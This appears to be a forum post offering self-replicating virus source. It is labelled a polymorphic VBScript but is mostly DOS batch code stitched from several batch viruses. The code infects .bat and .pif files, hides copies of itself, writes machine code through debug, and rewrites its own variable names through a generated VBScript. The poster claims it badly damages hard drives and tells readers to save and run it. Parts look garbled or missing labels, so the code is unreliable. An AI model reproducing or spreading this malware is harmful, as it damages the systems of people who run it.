.vbs Visual Basic Script Polymorphic


FS Member
This will damedge your hard drive terribly so dont run it unless you hate your pc or if your computer is running windows vista and open in a text document then save as INF3CTOR.vbs then run it and sit back and enjoy the insanity >

@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
command /e:5000 /c C:\_BfV ## run
goto BfV_end
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
set _MeLT=x
%0 %MeLTcl%
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
%MeLTH% MeLT s . .. %path%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
del MeLT.t
exit MeLT
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
set PiFV=
goto PiFV_end
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
%PiFVo% %PiFVcl%
goto PiFV_end
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs